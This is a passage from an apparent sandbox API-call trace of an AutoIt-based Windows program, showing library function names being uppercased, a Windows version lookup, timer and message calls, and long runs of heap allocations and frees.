0x11 [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_HASHDATA", cchLength=0xf | out: lpsz="_CRYPT_HASHDATA") returned 0xf [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.106] CharUpperBuffW (in: lpsz="_CRYPT_HASHFILE", cchLength=0xf | out: lpsz="_CRYPT_HASHFILE") returned 0xf [0073.106] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="_CRYPT_GENRANDOM", cchLength=0x10 | out: lpsz="_CRYPT_GENRANDOM") returned 0x10 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0073.107] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.107] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0073.108] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.109] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.109] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.109] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.109] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.109] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0073.189] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SHARE", cchLength=0x14 | out: lpsz="__ARRAYDISPLAY_SHARE") returned 0x14 [0073.189] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK", cchLength=0x23 | out: lpsz="__ARRAYDISPLAY_REGISTERSORTCALLBACK") returned 0x23 [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTCALLBACK", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_SORTCALLBACK") returned 0x1b [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SORTITEMS", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_SORTITEMS") returned 0x18 [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_ADDITEM") returned 0x16 [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_ADDSUBITEM", cchLength=0x19 | out: lpsz="__ARRAYDISPLAY_ADDSUBITEM") returned 0x19 [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT", cchLength=0x1d | out: lpsz="__ARRAYDISPLAY_GETCOLUMNCOUNT") returned 0x1d [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETHEADER", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_GETHEADER") returned 0x18 [0073.196] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_GETITEM") returned 0x16 [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMCOUNT", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_GETITEMCOUNT") returned 0x1b [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_GETITEMFORMAT") returned 0x1c [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXT", cchLength=0x1a | out: lpsz="__ARRAYDISPLAY_GETITEMTEXT") returned 0x1a [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING", cchLength=0x20 | out: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING") returned 0x20 [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN") returned 0x1c [0073.197] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_SETITEMFORMAT") returned 0x1c [0073.197] CharUpperBuffW (in: lpsz="_ARRAYADD", cchLength=0x9 | out: lpsz="_ARRAYADD") returned 0x9 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0073.197] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0073.197] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0073.197] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0073.197] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0073.197] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0073.197] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0073.197] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0073.197] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0073.197] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0073.197] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0073.197] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0073.198] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0073.198] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0073.198] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0073.198] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0073.198] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0073.198] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0073.198] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0073.198] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0073.198] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0073.198] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0073.198] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0073.198] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0073.198] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0073.198] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0073.198] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0073.198] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0073.198] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0073.198] CharUpperBuffW (in: lpsz="_FILECREATE", cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0073.198] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0073.199] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0073.199] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0073.199] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0073.199] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0073.199] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0073.199] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0073.199] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0073.199] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0073.199] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0073.199] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0073.199] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0073.199] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0073.199] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0073.199] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0073.199] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0073.201] CharUpperBuffW (in: lpsz="__WINVER", cchLength=0x8 | out: lpsz="__WINVER") returned 0x8 [0073.201] CharLowerBuffW (in: lpsz="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct", cchLength=0x87 | out: lpsz="struct;dword osversioninfosize;dword majorversion;dword minorversion;dword buildnumber;dword platformid;wchar csdversion[128];endstruct") returned 0x87 [0073.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0073.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetVersionExW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0073.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetVersionExW", cchWideChar=14, lpMultiByteStr=0x435b9a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetVersionExW", lpUsedDefaultChar=0x0) returned 14 [0073.202] FreeLibrary (hLibModule=0x772d0000) returned 1 [0073.202] TranslateMessage (lpMsg=0x144f38c) returned 0 [0073.202] DispatchMessageW (lpMsg=0x144f38c) returned 0x0 [0073.202] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0073.202] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0073.203] PeekMessageW (in: lpMsg=0x144f38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f38c) returned 0 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d01c8 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x17fb948 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0368 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17fb948 | out: hHeap=0x1780000) returned 1 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0368 | out: hHeap=0x1780000) returned 1 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0278 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d02c8 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fa8 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0378 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0378 | out: hHeap=0x1780000) returned 1 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d02c8 | out: hHeap=0x1780000) returned 1 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fa8 | out: hHeap=0x1780000) returned 1 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0278 | out: hHeap=0x1780000) returned 1 [0073.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d01c8 | out: hHeap=0x1780000) returned 1 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d01c8 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f5088 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb58 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0368 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ca0 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb10 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d02b8 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4e80 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b918 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0378 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc4) returned 0x18523c0 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba08 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0258 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb70 [0073.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0308 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9c0 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d03a8 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bb88 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d03c8 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435bab0 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d0248 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435ba50 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x17d03b8 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba08 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x17bc2c8 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb70 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4cf0 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9c0 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d18 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb88 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4d68 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bab0 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4ed0 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435ba50 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f5538 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0378 | out: hHeap=0x1780000) returned 1 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9f0 [0073.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0378 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0378 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f5538 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03b8 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4ed0 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0248 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d68 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03c8 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4d18 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03a8 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4cf0 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0308 | out: hHeap=0x1780000) returned 1 [0073.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17bc2c8 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0258 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x18523c0 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b918 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9f0 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4e80 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d02b8 | out: hHeap=0x1780000) returned 1 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b9c0 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d0298 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d03a8 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d03a8 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0298 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435bb10 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x435b9c0 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17f4ca0 | out: hHeap=0x1780000) returned 1 [0073.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17d0368 | out: hHeap=0x1780000) returned 1 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x435b930 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x17d03a8 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x17f4e80 [0073.205] RtlAllocateHeap (HeapHandle=0x1780000, 